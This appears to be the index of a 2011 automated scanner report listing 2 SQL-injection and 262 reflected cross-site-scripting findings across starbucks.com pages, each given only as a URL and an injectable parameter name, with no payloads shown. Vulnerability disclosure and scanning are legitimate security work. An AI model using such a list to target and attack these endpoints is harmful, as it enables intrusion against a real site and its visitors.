XSS, starbucks.com, Cross Site Scripting, Proof of Concept

XSS in starbucks.com | Vulnerability Crawler Report

Report generated by XSS.CX at Tue Feb 08 11:37:52 CST 2011.



DORK CWE-79 XSS Report

Loading

1. SQL injection

1.1. http://www.starbucks.com/menu/food/salads/fruit-cup [name of an arbitrarily supplied request parameter]

1.2. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad [name of an arbitrarily supplied request parameter]

2. Cross-site scripting (reflected)

2.1. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]

2.2. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]

2.3. http://www.starbucks.com/about-us [name of an arbitrarily supplied request parameter]

2.4. http://www.starbucks.com/about-us/company-information [name of an arbitrarily supplied request parameter]

2.5. http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement [name of an arbitrarily supplied request parameter]

2.6. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use [name of an arbitrarily supplied request parameter]

2.7. http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility [name of an arbitrarily supplied request parameter]

2.8. http://www.starbucks.com/about-us/company-information/product-advisories [name of an arbitrarily supplied request parameter]

2.9. http://www.starbucks.com/about-us/our-heritage [name of an arbitrarily supplied request parameter]

2.10. http://www.starbucks.com/business [name of an arbitrarily supplied request parameter]

2.11. http://www.starbucks.com/business/foodservice [name of an arbitrarily supplied request parameter]

2.12. http://www.starbucks.com/business/international-stores [name of an arbitrarily supplied request parameter]

2.13. http://www.starbucks.com/business/licensed-stores [name of an arbitrarily supplied request parameter]

2.14. http://www.starbucks.com/business/office-coffee [name of an arbitrarily supplied request parameter]

2.15. http://www.starbucks.com/career-center [name of an arbitrarily supplied request parameter]

2.16. http://www.starbucks.com/career-center [name of an arbitrarily supplied request parameter]

2.17. http://www.starbucks.com/career-center/career-diversity [name of an arbitrarily supplied request parameter]

2.18. http://www.starbucks.com/career-center/career-diversity/partner-networks [name of an arbitrarily supplied request parameter]

2.19. http://www.starbucks.com/career-center/career-diversity/partner-networks [name of an arbitrarily supplied request parameter]

2.20. http://www.starbucks.com/career-center/international-positions [name of an arbitrarily supplied request parameter]

2.21. http://www.starbucks.com/career-center/working-at-starbucks [name of an arbitrarily supplied request parameter]

2.22. http://www.starbucks.com/career-center/working-at-starbucks [name of an arbitrarily supplied request parameter]

2.23. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]

2.24. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]

2.25. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]

2.26. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]

2.27. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]

2.28. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]

2.29. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]

2.30. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]

2.31. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]

2.32. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]

2.33. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]

2.34. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]

2.35. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]

2.36. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia [name of an arbitrarily supplied request parameter]

2.37. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia [name of an arbitrarily supplied request parameter]

2.38. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java [name of an arbitrarily supplied request parameter]

2.39. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java [name of an arbitrarily supplied request parameter]

2.40. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria [name of an arbitrarily supplied request parameter]

2.41. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria [name of an arbitrarily supplied request parameter]

2.42. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]

2.43. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]

2.44. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]

2.45. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]

2.46. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]

2.47. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]

2.48. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]

2.49. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]

2.50. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]

2.51. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]

2.52. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]

2.53. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast [name of an arbitrarily supplied request parameter]

2.54. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast [name of an arbitrarily supplied request parameter]

2.55. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]

2.56. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]

2.57. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]

2.58. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]

2.59. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]

2.60. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]

2.61. http://www.starbucks.com/coffeehouse/community [name of an arbitrarily supplied request parameter]

2.62. http://www.starbucks.com/coffeehouse/community/mystarbucksidea [name of an arbitrarily supplied request parameter]

2.63. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]

2.64. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]

2.65. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]

2.66. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]

2.67. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks [name of an arbitrarily supplied request parameter]

2.68. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile [name of an arbitrarily supplied request parameter]

2.69. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb [name of an arbitrarily supplied request parameter]

2.70. http://www.starbucks.com/coffeehouse/store-design [name of an arbitrarily supplied request parameter]

2.71. http://www.starbucks.com/coffeehouse/wireless-internet [name of an arbitrarily supplied request parameter]

2.72. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada [name of an arbitrarily supplied request parameter]

2.73. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network [name of an arbitrarily supplied request parameter]

2.74. http://www.starbucks.com/customer-service [name of an arbitrarily supplied request parameter]

2.75. http://www.starbucks.com/customer-service/contact [name of an arbitrarily supplied request parameter]

2.76. http://www.starbucks.com/customer-service/faqs/card [name of an arbitrarily supplied request parameter]

2.77. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]

2.78. http://www.starbucks.com/customer-service/faqs/coffeehouse [name of an arbitrarily supplied request parameter]

2.79. http://www.starbucks.com/customer-service/faqs/menu [name of an arbitrarily supplied request parameter]

2.80. http://www.starbucks.com/customer-service/faqs/responsibility [name of an arbitrarily supplied request parameter]

2.81. http://www.starbucks.com/customer-service/faqs/shop [name of an arbitrarily supplied request parameter]

2.82. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]

2.83. http://www.starbucks.com/menu/ [name of an arbitrarily supplied request parameter]

2.84. http://www.starbucks.com/menu/catalog/nutrition [name of an arbitrarily supplied request parameter]

2.85. http://www.starbucks.com/menu/catalog/nutrition [wellness parameter]

2.86. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]

2.87. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha [name of an arbitrarily supplied request parameter]

2.88. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-mocha [name of an arbitrarily supplied request parameter]

2.89. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-vanilla [name of an arbitrarily supplied request parameter]

2.90. http://www.starbucks.com/menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

2.91. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

2.92. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-frappuccino [name of an arbitrarily supplied request parameter]

2.93. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-doubleshot [name of an arbitrarily supplied request parameter]

2.94. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot [name of an arbitrarily supplied request parameter]

2.95. http://www.starbucks.com/menu/drinks/bottled-drinks/mocha-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

2.96. http://www.starbucks.com/menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

2.97. http://www.starbucks.com/menu/drinks/brewed-coffee/bold-pick-of-the-day [name of an arbitrarily supplied request parameter]

2.98. http://www.starbucks.com/menu/drinks/brewed-coffee/cafe-misto [name of an arbitrarily supplied request parameter]

2.99. http://www.starbucks.com/menu/drinks/brewed-coffee/clover-brewed-coffee [name of an arbitrarily supplied request parameter]

2.100. http://www.starbucks.com/menu/drinks/brewed-coffee/coffee-traveler [name of an arbitrarily supplied request parameter]

2.101. http://www.starbucks.com/menu/drinks/brewed-coffee/decaf-pike-place-roast [name of an arbitrarily supplied request parameter]

2.102. http://www.starbucks.com/menu/drinks/brewed-coffee/iced-coffee [name of an arbitrarily supplied request parameter]

2.103. http://www.starbucks.com/menu/drinks/brewed-coffee/pikes-place-roast [name of an arbitrarily supplied request parameter]

2.104. http://www.starbucks.com/menu/drinks/chocolate/hot-chocolate [name of an arbitrarily supplied request parameter]

2.105. http://www.starbucks.com/menu/drinks/chocolate/peppermint-mocha-hot-chocolate [name of an arbitrarily supplied request parameter]

2.106. http://www.starbucks.com/menu/drinks/chocolate/salted-caramel-hot-chocolate [name of an arbitrarily supplied request parameter]

2.107. http://www.starbucks.com/menu/drinks/chocolate/white-hot-chocolate [name of an arbitrarily supplied request parameter]

2.108. http://www.starbucks.com/menu/drinks/espresso/caffe-americano [name of an arbitrarily supplied request parameter]

2.109. http://www.starbucks.com/menu/drinks/espresso/caffe-latte [name of an arbitrarily supplied request parameter]

2.110. http://www.starbucks.com/menu/drinks/espresso/caffe-mocha [name of an arbitrarily supplied request parameter]

2.111. http://www.starbucks.com/menu/drinks/espresso/cappuccino [name of an arbitrarily supplied request parameter]

2.112. http://www.starbucks.com/menu/drinks/espresso/caramel-brulee-latte [name of an arbitrarily supplied request parameter]

2.113. http://www.starbucks.com/menu/drinks/espresso/caramel-macchiato [name of an arbitrarily supplied request parameter]

2.114. http://www.starbucks.com/menu/drinks/espresso/cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]

2.115. http://www.starbucks.com/menu/drinks/espresso/eggnog-latte [name of an arbitrarily supplied request parameter]

2.116. http://www.starbucks.com/menu/drinks/espresso/espresso-con-panna [name of an arbitrarily supplied request parameter]

2.117. http://www.starbucks.com/menu/drinks/espresso/espresso-macchiato [name of an arbitrarily supplied request parameter]

2.118. http://www.starbucks.com/menu/drinks/espresso/espresso-shot [name of an arbitrarily supplied request parameter]

2.119. http://www.starbucks.com/menu/drinks/espresso/flavored-latte [name of an arbitrarily supplied request parameter]

2.120. http://www.starbucks.com/menu/drinks/espresso/gingerbread-latte [name of an arbitrarily supplied request parameter]

2.121. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-americano [name of an arbitrarily supplied request parameter]

2.122. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-latte [name of an arbitrarily supplied request parameter]

2.123. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-mocha [name of an arbitrarily supplied request parameter]

2.124. http://www.starbucks.com/menu/drinks/espresso/iced-caramel-macchiato [name of an arbitrarily supplied request parameter]

2.125. http://www.starbucks.com/menu/drinks/espresso/iced-cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]

2.126. http://www.starbucks.com/menu/drinks/espresso/iced-flavored-latte [name of an arbitrarily supplied request parameter]

2.127. http://www.starbucks.com/menu/drinks/espresso/iced-gingerbread-latte [name of an arbitrarily supplied request parameter]

2.128. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-mocha [name of an arbitrarily supplied request parameter]

2.129. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-white-chocolate-mocha [name of an arbitrarily supplied request parameter]

2.130. http://www.starbucks.com/menu/drinks/espresso/iced-pumpkin-spice-latte [name of an arbitrarily supplied request parameter]

2.131. http://www.starbucks.com/menu/drinks/espresso/iced-skinny-flavored-latte [name of an arbitrarily supplied request parameter]

2.132. http://www.starbucks.com/menu/drinks/espresso/iced-toffee-mocha [name of an arbitrarily supplied request parameter]

2.133. http://www.starbucks.com/menu/drinks/espresso/iced-white-chocolate-mocha [name of an arbitrarily supplied request parameter]

2.134. http://www.starbucks.com/menu/drinks/espresso/peppermint-mocha [name of an arbitrarily supplied request parameter]

2.135. http://www.starbucks.com/menu/drinks/espresso/peppermint-white-chocolate-mocha [name of an arbitrarily supplied request parameter]

2.136. http://www.starbucks.com/menu/drinks/espresso/pumpkin-spice-latte [name of an arbitrarily supplied request parameter]

2.137. http://www.starbucks.com/menu/drinks/espresso/skinny-caramel-macchiato [name of an arbitrarily supplied request parameter]

2.138. http://www.starbucks.com/menu/drinks/espresso/skinny-cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]

2.139. http://www.starbucks.com/menu/drinks/espresso/skinny-flavored-latte [name of an arbitrarily supplied request parameter]

2.140. http://www.starbucks.com/menu/drinks/espresso/toffee-mocha [name of an arbitrarily supplied request parameter]

2.141. http://www.starbucks.com/menu/drinks/espresso/white-chocolate-mocha [name of an arbitrarily supplied request parameter]

2.142. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]

2.143. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.144. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

2.145. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.146. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.147. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

2.148. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.149. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.150. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.151. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

2.152. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.153. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

2.154. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.155. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.156. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.157. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.158. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.159. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

2.160. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.161. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

2.162. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.163. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]

2.164. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.165. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.166. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]

2.167. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.168. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.169. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.170. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]

2.171. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.172. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.173. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.174. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/caramel-apple-spice [name of an arbitrarily supplied request parameter]

2.175. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/cold-apple-juice [name of an arbitrarily supplied request parameter]

2.176. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/flavored-steamed-milk [name of an arbitrarily supplied request parameter]

2.177. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/milk [name of an arbitrarily supplied request parameter]

2.178. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/steamed-apple-juice [name of an arbitrarily supplied request parameter]

2.179. http://www.starbucks.com/menu/drinks/tazo-tea/awake [name of an arbitrarily supplied request parameter]

2.180. http://www.starbucks.com/menu/drinks/tazo-tea/awake-tea-latte [name of an arbitrarily supplied request parameter]

2.181. http://www.starbucks.com/menu/drinks/tazo-tea/black-shaken-iced-tea [name of an arbitrarily supplied request parameter]

2.182. http://www.starbucks.com/menu/drinks/tazo-tea/calm [name of an arbitrarily supplied request parameter]

2.183. http://www.starbucks.com/menu/drinks/tazo-tea/chai-latte [name of an arbitrarily supplied request parameter]

2.184. http://www.starbucks.com/menu/drinks/tazo-tea/china-green-tips [name of an arbitrarily supplied request parameter]

2.185. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey [name of an arbitrarily supplied request parameter]

2.186. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey-tea-latte [name of an arbitrarily supplied request parameter]

2.187. http://www.starbucks.com/menu/drinks/tazo-tea/green-tea-latte [name of an arbitrarily supplied request parameter]

2.188. http://www.starbucks.com/menu/drinks/tazo-tea/iced-awake-tea-latte [name of an arbitrarily supplied request parameter]

2.189. http://www.starbucks.com/menu/drinks/tazo-tea/iced-chai-tea-latte [name of an arbitrarily supplied request parameter]

2.190. http://www.starbucks.com/menu/drinks/tazo-tea/iced-green-tea-latte [name of an arbitrarily supplied request parameter]

2.191. http://www.starbucks.com/menu/drinks/tazo-tea/orange-blossom [name of an arbitrarily supplied request parameter]

2.192. http://www.starbucks.com/menu/drinks/tazo-tea/passion [name of an arbitrarily supplied request parameter]

2.193. http://www.starbucks.com/menu/drinks/tazo-tea/refresh [name of an arbitrarily supplied request parameter]

2.194. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade [name of an arbitrarily supplied request parameter]

2.195. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea [name of an arbitrarily supplied request parameter]

2.196. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade [name of an arbitrarily supplied request parameter]

2.197. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea [name of an arbitrarily supplied request parameter]

2.198. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade [name of an arbitrarily supplied request parameter]

2.199. http://www.starbucks.com/menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea [name of an arbitrarily supplied request parameter]

2.200. http://www.starbucks.com/menu/drinks/tazo-tea/vanilla-roobios-tea-latte [name of an arbitrarily supplied request parameter]

2.201. http://www.starbucks.com/menu/drinks/tazo-tea/zen [name of an arbitrarily supplied request parameter]

2.202. http://www.starbucks.com/menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie [name of an arbitrarily supplied request parameter]

2.203. http://www.starbucks.com/menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie [name of an arbitrarily supplied request parameter]

2.204. http://www.starbucks.com/menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie [name of an arbitrarily supplied request parameter]

2.205. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]

2.206. http://www.starbucks.com/menu/food/bakery/8-grain-roll [name of an arbitrarily supplied request parameter]

2.207. http://www.starbucks.com/menu/food/bakery/apple-bran-muffin [name of an arbitrarily supplied request parameter]

2.208. http://www.starbucks.com/menu/food/bakery/apple-fritter [name of an arbitrarily supplied request parameter]

2.209. http://www.starbucks.com/menu/food/bakery/asiago-bagel [name of an arbitrarily supplied request parameter]

2.210. http://www.starbucks.com/menu/food/bakery/banana-nut-loaf [name of an arbitrarily supplied request parameter]

2.211. http://www.starbucks.com/menu/food/bakery/birthday-cake-mini-doughnut [name of an arbitrarily supplied request parameter]

2.212. http://www.starbucks.com/menu/food/bakery/blueberry-oat-bar [name of an arbitrarily supplied request parameter]

2.213. http://www.starbucks.com/menu/food/bakery/blueberry-scone [name of an arbitrarily supplied request parameter]

2.214. http://www.starbucks.com/menu/food/bakery/blueberry-streusel-muffin [name of an arbitrarily supplied request parameter]

2.215. http://www.starbucks.com/menu/food/bakery/butter-croissant [name of an arbitrarily supplied request parameter]

2.216. http://www.starbucks.com/menu/food/bakery/cheese-danish [name of an arbitrarily supplied request parameter]

2.217. http://www.starbucks.com/menu/food/bakery/chocolate-chunk-cookie [name of an arbitrarily supplied request parameter]

2.218. http://www.starbucks.com/menu/food/bakery/chocolate-croissant [name of an arbitrarily supplied request parameter]

2.219. http://www.starbucks.com/menu/food/bakery/chocolate-old-fashion-doughnut [name of an arbitrarily supplied request parameter]

2.220. http://www.starbucks.com/menu/food/bakery/chonga-bagel [name of an arbitrarily supplied request parameter]

2.221. http://www.starbucks.com/menu/food/bakery/cinnamon-chip-scone [name of an arbitrarily supplied request parameter]

2.222. http://www.starbucks.com/menu/food/bakery/cranberry-orange-scone [name of an arbitrarily supplied request parameter]

2.223. http://www.starbucks.com/menu/food/bakery/double-chocolate-brownie [name of an arbitrarily supplied request parameter]

2.224. http://www.starbucks.com/menu/food/bakery/double-fudge-mini-doughnut [name of an arbitrarily supplied request parameter]

2.225. http://www.starbucks.com/menu/food/bakery/double-iced-cinnamon-roll [name of an arbitrarily supplied request parameter]

2.226. http://www.starbucks.com/menu/food/bakery/ginger-molasses-cookie [name of an arbitrarily supplied request parameter]

2.227. http://www.starbucks.com/menu/food/bakery/hawaiian-bagel [name of an arbitrarily supplied request parameter]

2.228. http://www.starbucks.com/menu/food/bakery/iced-lemon-pound-cake [name of an arbitrarily supplied request parameter]

2.229. http://www.starbucks.com/menu/food/bakery/low-fat-raspberry-sunshine-muffin [name of an arbitrarily supplied request parameter]

2.230. http://www.starbucks.com/menu/food/bakery/mallorca-sweet-bread [name of an arbitrarily supplied request parameter]

2.231. http://www.starbucks.com/menu/food/bakery/maple-oat-pecan-scone [name of an arbitrarily supplied request parameter]

2.232. http://www.starbucks.com/menu/food/bakery/marble-pound-cake [name of an arbitrarily supplied request parameter]

2.233. http://www.starbucks.com/menu/food/bakery/marshmallow-dream-bar [name of an arbitrarily supplied request parameter]

2.234. http://www.starbucks.com/menu/food/bakery/morning-bun [name of an arbitrarily supplied request parameter]

2.235. http://www.starbucks.com/menu/food/bakery/multigrain-bagel [name of an arbitrarily supplied request parameter]

2.236. http://www.starbucks.com/menu/food/bakery/old-fashion-glazed-doughnut [name of an arbitrarily supplied request parameter]

2.237. http://www.starbucks.com/menu/food/bakery/outrageous-oatmeal-cookie [name of an arbitrarily supplied request parameter]

2.238. http://www.starbucks.com/menu/food/bakery/petite-vanilla-bean-scone [name of an arbitrarily supplied request parameter]

2.239. http://www.starbucks.com/menu/food/bakery/plain-bagel [name of an arbitrarily supplied request parameter]

2.240. http://www.starbucks.com/menu/food/bakery/pumpkin-bread [name of an arbitrarily supplied request parameter]

2.241. http://www.starbucks.com/menu/food/bakery/raspberry-scone [name of an arbitrarily supplied request parameter]

2.242. http://www.starbucks.com/menu/food/bakery/red-velvet-cupcake [name of an arbitrarily supplied request parameter]

2.243. http://www.starbucks.com/menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake [name of an arbitrarily supplied request parameter]

2.244. http://www.starbucks.com/menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake [name of an arbitrarily supplied request parameter]

2.245. http://www.starbucks.com/menu/food/bakery/reduced-fat-very-berry-coffeecake [name of an arbitrarily supplied request parameter]

2.246. http://www.starbucks.com/menu/food/bakery/starbucks-classic-coffee-cake [name of an arbitrarily supplied request parameter]

2.247. http://www.starbucks.com/menu/food/bakery/treat-sized-double-chocolate-cookie [name of an arbitrarily supplied request parameter]

2.248. http://www.starbucks.com/menu/food/bakery/treat-sized-peanut-butter-cookie [name of an arbitrarily supplied request parameter]

2.249. http://www.starbucks.com/menu/food/bakery/vanilla-bean-cupcake [name of an arbitrarily supplied request parameter]

2.250. http://www.starbucks.com/menu/food/bakery/zucchini-walnut-muffin [name of an arbitrarily supplied request parameter]

2.251. http://www.starbucks.com/menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate [name of an arbitrarily supplied request parameter]

2.252. http://www.starbucks.com/menu/food/fruit-and-snack-plates/fruit-and-cheese-plate [name of an arbitrarily supplied request parameter]

2.253. http://www.starbucks.com/menu/food/fruit-and-snack-plates/protein-plate [name of an arbitrarily supplied request parameter]

2.254. http://www.starbucks.com/menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll [name of an arbitrarily supplied request parameter]

2.255. http://www.starbucks.com/menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap [name of an arbitrarily supplied request parameter]

2.256. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-brown-sugar [name of an arbitrarily supplied request parameter]

2.257. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-dried-fruit [name of an arbitrarily supplied request parameter]

2.258. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-mixed-nuts [name of an arbitrarily supplied request parameter]

2.259. http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin [name of an arbitrarily supplied request parameter]

2.260. http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin [name of an arbitrarily supplied request parameter]

2.261. http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal [name of an arbitrarily supplied request parameter]

2.262. http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich [name of an arbitrarily supplied request parameter]

